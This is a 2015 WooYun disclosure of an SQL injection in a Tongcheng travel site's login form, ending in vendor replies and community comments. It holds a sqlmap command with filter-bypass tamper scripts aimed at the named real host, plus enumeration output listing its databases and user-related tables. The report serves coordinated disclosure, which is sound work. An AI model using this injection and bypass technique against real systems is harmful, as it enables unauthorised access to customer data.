当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098572

漏洞标题:同程旅游旗下某旅游网站SQL注射漏洞危机该站数据(绕waf)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: BMa

提交时间:2015-02-27 18:31

修复时间:2015-04-13 18:32

公开时间:2015-04-13 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

同程旅游某站拖走全网库
听说你们的rank很不错哦

详细说明:

注入:

http://www.tycts.com:80/website/websitelayout8/login/index (POST)
name=1&password=e


参数:name
存在过滤,使用tamper
www.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db
上图:
current database: 'TCLine'

1.jpg


current user: '17uLXSLine'

2.jpg


available databases [10]:
[*] 17u_net
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCLineBase
[*] TCLineResource
[*] TCShare
[*] tempdb


3.jpg


4.jpg


5.jpg


可以拖走全网库,本来是想用count来看看的,奈何表太多了,弄一些证明一下:

[14:48:48] [INFO] fetching database names
[14:48:50] [INFO] the SQL query used returns 11 entries
[14:48:52] [INFO] retrieved: 17u_net
[14:48:54] [INFO] retrieved: TCB2cBlog
[14:48:56] [INFO] retrieved: TCB2cWenDa
[14:48:58] [INFO] retrieved: TCLineBase
[14:49:01] [INFO] retrieved: TCLineBase
[14:49:03] [INFO] retrieved: TCLineResource
[14:49:05] [INFO] retrieved: TCShare
[14:49:07] [INFO] retrieved: master
[14:49:09] [INFO] retrieved: model
[14:49:12] [INFO] retrieved: msdb
[14:49:14] [INFO] retrieved: tempdb
[14:49:14] [INFO] fetching tables for databases: 17u_net, TCB2cBlog, TCB2cWenDa,
 TCLineBase, TCLineResource, TCShare, master, model, msdb, tempdb
[14:49:22] [INFO] the SQL query used returns 5 entries
[14:49:24] [INFO] retrieved: dbo.Line_TCPF_GroupArea
[14:49:26] [INFO] retrieved: dbo.MSreplication_objects
[14:49:29] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:34] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:49:37] [INFO] retrieved: dbo.MSsubscription_agents
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:45] [INFO] the SQL query used returns 9 entries
[14:49:47] [INFO] retrieved: dbo.MSreplication_objects
[14:49:50] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:55] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:49:56] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:00] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:02] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:04] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:06] [INFO] retrieved: dbo.b2c_cn_blog_article
[14:50:09] [INFO] retrieved: dbo.b2c_cn_blog_userControl
[14:50:11] [INFO] the SQL query used returns 17 entries
[14:50:14] [INFO] retrieved: dbo.DataDictionary
[14:50:16] [INFO] retrieved: dbo.KeywordsSource
[14:50:18] [INFO] retrieved: dbo.LineKeywords
[14:50:20] [INFO] retrieved: dbo.Line_CustomFunction
[14:50:23] [INFO] retrieved: dbo.Line_Member_CustomFunction
[14:50:26] [INFO] retrieved: dbo.MSreplication_objects
[14:50:28] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:50:30] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:50:32] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:34] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:36] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:38] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:41] [INFO] retrieved: dbo.MemberUnionPayAccount
[14:50:43] [INFO] retrieved: dbo.Sys_Parameter
[14:50:45] [INFO] retrieved: dbo.ZFXApply
[14:50:48] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:51] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:53] [INFO] the SQL query used returns 20 entries
[14:50:55] [INFO] retrieved: dbo.backupfile
[14:50:57] [INFO] retrieved: dbo.backupmediafamily
[14:50:59] [INFO] retrieved: dbo.backupmediaset
[14:51:01] [INFO] retrieved: dbo.backupset
[14:51:04] [INFO] retrieved: dbo.logmarkhistory
[14:51:07] [INFO] retrieved: dbo.restorefilegroup
[14:51:09] [INFO] retrieved: dbo.restorefilegroup
[14:51:13] [INFO] retrieved: dbo.restorehistory
[14:51:15] [INFO] retrieved: dbo.suspect_pages
[14:51:18] [INFO] retrieved: dbo.syspolicy_conditions
[14:51:20] [INFO] retrieved: dbo.syspolicy_configuration
[14:51:22] [INFO] retrieved: dbo.syspolicy_object_sets
[14:51:24] [INFO] retrieved: dbo.syspolicy_policies
[14:51:26] [INFO] retrieved: dbo.syspolicy_policy_categories
[14:51:29] [INFO] retrieved: dbo.syspolicy_policy_category_subscriptions
[14:51:32] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:34] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:36] [INFO] retrieved: dbo.syspolicy_system_health_state
[14:51:40] [INFO] retrieved: dbo.syspolicy_target_set_levels
[14:51:43] [INFO] retrieved: dbo.syspolicy_target_sets
[14:51:45] [INFO] the SQL query used returns 5 entries
[14:51:47] [INFO] retrieved: dbo.b2c_cn_answer
[14:51:52] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:54] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:56] [INFO] retrieved: dbo.b2c_cn_question_class
[14:51:58] [INFO] retrieved: dbo.dtproperties
[14:52:01] [INFO] the SQL query used returns 359 entries
[14:52:04] [INFO] retrieved: INFORMATION_SCHEMA.CHECK_CONSTRAINTS
[14:52:07] [INFO] retrieved: INFORMATION_SCHEMA.COLUMNS
[14:52:10] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
[14:52:13] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_PRIVILEGES
[14:52:17] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
[14:52:21] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
[14:52:26] [INFO] retrieved: INFORMATION_SCHEMA.DOMAINS
[14:52:30] [INFO] retrieved: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
[14:52:34] [INFO] retrieved: INFORMATION_SCHEMA.KEY_COLUMN_USAGE
[14:52:39] [INFO] retrieved: INFORMATION_SCHEMA.PARAMETERS
[14:52:44] [INFO] retrieved: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
[14:52:50] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINES
[14:52:55] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINE_COLUMNS
[14:53:01] [INFO] retrieved: INFORMATION_SCHEMA.SCHEMATA
[14:53:07] [INFO] retrieved: INFORMATION_SCHEMA.TABLES
[14:53:13] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_CONSTRAINTS
[14:53:22] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_PRIVILEGES
[14:53:28] [INFO] retrieved: INFORMATION_SCHEMA.VIEWS
[14:53:37] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
[14:53:44] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_TABLE_USAGE
[14:53:51] [INFO] retrieved: dbo.spt_fallback_db
[14:53:59] [INFO] retrieved: dbo.spt_fallback_dev
[14:54:07] [INFO] retrieved: dbo.spt_fallback_usg
[14:54:15] [INFO] retrieved: dbo.spt_monitor
[14:54:23] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
[14:54:25] [INFO] the SQL query used returns 17 entries
[14:54:27] [INFO] retrieved: dbo.B2C_user
[14:54:29] [INFO] retrieved: dbo.MSreplication_objects
[14:54:32] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:54:34] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:54:37] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:54:41] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:54:43] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:54:45] [INFO] retrieved: dbo.MSsubscription_agents
[14:54:47] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:49] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:51] [INFO] retrieved: dbo.UserDeliverAddress
[14:54:54] [INFO] retrieved: dbo.b2cUserLoginLog
[14:54:56] [INFO] retrieved: dbo.b2c_cn_scenery_place
[14:54:58] [INFO] retrieved: dbo.globalControl
[14:55:01] [INFO] retrieved: dbo.guojiadiqudata
[14:55:05] [INFO] retrieved: dbo.weathercomcncity
[14:55:08] [INFO] retrieved: dbo.weathercomcncity

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-27 18:34

厂商回复:

感谢关注同程旅游,兄弟看你这一串tamper脚本,绕过辛苦了,稍后会安排寄出300京东礼品卡以示谢意。

最新状态:

2015-02-27:另,这也不是waf,他们自己搞的防注入,见笑了。

2015-02-27:pss 这是同程旗下的六合一旅行社系统,洞主你该发通用,你亏了。

漏洞评价:

评论

  1. 2015-02-27 18:58 | Mik3y_14 ( 普通白帽子 | Rank:181 漏洞数:29 | 愿君多采撷,此物最相思。)

    厂商挺有趣的

  2. 2015-02-27 18:58 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @苏州同程旅游网络科技有限公司 我还没弄清楚你们之间的关系另外 我原来的标题不是这样的

  3. 2015-02-27 19:18 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @BMa 我跟厂商确认后改了下,因为域名,你懂得:)

  4. 2015-02-27 19:26 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    硬件waf:卧槽现在什么东西都能叫waf了,比如软件的xx狗和防注入代码

  5. 2015-02-28 11:00 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @苏州同程旅游网络科技有限公司 还有另外一个注入点,睡一觉起来,你们就给补了 - - !昨天动静太大了

  6. 2015-03-03 19:22 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @BMa 是切到软waf上了,哈。

  7. 2015-03-03 19:25 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @BMa 这次能绕过就是真的绕waf了,绕过500,连之前的300一起发。不过下次就不要说拖库什么的了,开发受到的压力会很大的。

  8. 2015-03-03 20:23 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @苏州同程旅游网络科技有限公司 我以为补了,没动了 有时间我再看看

  9. 2015-03-19 18:00 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @苏州同程旅游网络科技有限公司 京东卡已经收到 感谢厂商理解白帽子